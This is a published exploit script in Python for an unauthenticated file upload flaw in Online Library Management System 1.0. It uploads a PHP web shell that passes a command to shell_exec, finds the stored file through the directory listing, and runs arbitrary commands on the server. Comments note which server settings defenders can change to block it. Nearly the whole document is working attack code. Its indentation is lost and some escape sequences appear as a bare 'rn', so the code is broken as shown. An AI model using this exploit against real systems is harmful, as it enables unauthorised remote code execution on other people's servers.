Authored by Berk Can Geyikci

Online Library Management System version 1.0 suffers from a remote shell upload vulnerability. This is a formal exploit for the vulnerability previously discovered by Jyotsna Adhana in October 2020.

# Exploit Title: Online Library Management System 1.0 - Arbitrary File Upload Remote Code Execution (Unauthenticated)
# Date: 23-06-2021
# Exploit Author: Berk Can Geyikci
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/ols.zip
# Version: 1.0
# Tested on: Windows 10 Pro 64 Bit 10.0.19041 + XAMPP V7.3.28
# Exploit Tested Using: Python 3.8.6

'''
Steps to reproduce:
1) Click Books
2) Select one book and click Read more
3) Get the book id from the URL #example_url http://localhost/ols/index.php?q=bookdetails&id=15243678
4) Execute the Python script with the URL, book id and command
'''


'''
Import required modules:
'''
import sys, hashlib, requests
import urllib
import time
import random

# Proof-of-concept for the unauthenticated file upload in OLS 1.0 described in
# the header above. Flow: obtain a PHPSESSID, submit the borrower form with a
# .php file in the "picture" field, locate the stored file via the directory
# listing of asset/images/borrower/, then request it to read the output.
#
# Defender notes (what this PoC depends on, and therefore what breaks it):
#   - proccess.php?action=add accepts a .php upload in the "picture" field
#     without a server-side extension/content allowlist;
#   - the upload is stored under the web root (asset/images/borrower/) where
#     the server executes PHP;
#   - directory listing is enabled on asset/images/borrower/ (used below to
#     recover the stored filename).
try:
#settings
# Positional arguments: base URL, book id and the command to run; no
# validation beyond the IndexError handler below.
target_url = sys.argv[1]
book_id = sys.argv[2]
command = sys.argv[3]

except IndexError:

print("- usage: %s <target> <book_id> <command>" % sys.argv[0])
print("- Example: %s http://example.com 15243678 'whoami'" % sys.argv[0])
sys.exit()

# Upload endpoint: the borrower "add" action of proccess.php.
url = target_url+"/ols/proccess.php?action=add"

# Fetch /ols once only to be issued a PHPSESSID; the Session object itself is
# not reused below — the cookie is copied into a manual "Cookie" header.
# Raises KeyError if the server did not set PHPSESSID.
session = requests.Session()
session.get(target_url+"/ols")
session_cookies = session.cookies
php_cookie = session.cookies.get_dict()['PHPSESSID'].strip()
print("Getting Session Cookie= "+php_cookie)

# Used both as the BorrowerId form value and as part of the uploaded
# filename (rcepoc_<id>.php), which is how the file is found again later.
random_borrower_id = random.randint(0,999999)

#Headers to upload php
# Fixed browser-like headers plus the session cookie; the multipart boundary
# in Content-Type must match the one hard-coded in the body below.
headers = {
"Accept-Encoding": "gzip, deflate",
"Referer": target_url + "/ols/index.php?q=borrow&id="+ book_id +"/",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryBA3sFU893qYE7jKq",
"Upgrade-Insecure-Requests": "1",
"Connection": "close",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Cookie": "PHPSESSID="+php_cookie
}

# Load the borrow page for the book before posting the form; the response is
# not inspected.
req = requests.get(target_url+"/ols/index.php?q=borrow&id="+book_id, headers=headers)


# Hand-built multipart body for the borrower form. All text fields are dummy
# values; the "picture" part carries a .php file whose body passes the
# command to shell_exec. This is the input a server-side upload filter
# (extension + content allowlist, storage outside the web root) must reject.
data = "------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="id"rnrn15243678rn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="BorrowerId"rnrn"+str(random_borrower_id)+"rn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="deptid"rnrnrn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="Firstname"rnrndummy_firstnamern------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="deptid"rnrnrn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="Lastname"rnrndummy_lastnamern------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="deptid"rnrnrn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="MiddleName"rnrndummy_middlenamern------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="Address"rnrndummy_addressrn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="optionsRadios"rnrnMalern------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="ContactNo"rnrn1rn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="CourseYear"rnrn2021rn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="BUsername"rnrndummy_usernamern------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="BPassword"rnrndummy_rn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="picture"; filename="rcepoc_"+str(random_borrower_id)+".php"rnContent-Type: application/octet-streamrnrn<?phprnrnrnrnecho shell_exec('"+command+"');rnrnrnrn?>rn------WebKitFormBoundaryBA3sFU893qYE7jKqrnContent-Disposition: form-data; name="save"rnrnrn------WebKitFormBoundaryBA3sFU893qYE7jKq--rn"

# Submit the form; the response status is not checked.
req = requests.post(url, headers=headers, data=data)
print("Uploading file...")

# Two follow-up GETs (checkout action, borrower page). Their role is not
# evident from here — presumably they complete the borrow flow; responses are
# discarded.
req = requests.get(target_url+"/ols/proccess.php?action=checkout&id="+book_id, headers=headers)
#print(req.text)

req = requests.get(target_url+"/ols/borrower/", headers=headers)
#print(req.text)

# Recover the stored filename from the directory listing of the upload folder:
# locate the random id in the HTML and take a fixed window (21 chars before,
# 10 after) around it. This assumes directory listing is enabled and that the
# listing layout is fixed; disabling directory listing removes this step.
req = requests.get(target_url+"/ols/asset/images/borrower/", headers=headers)
reqq = req.text
#print(reqq)
reqqq = reqq.find(str(random_borrower_id))
command_result = reqq[reqqq-21:reqqq+10]

# Request the uploaded file; because PHP executes in the images directory,
# the response body is the command output.
req = requests.get(target_url+"/ols/asset/images/borrower/"+command_result+"", headers=headers)
print("Command Result = "+req.text)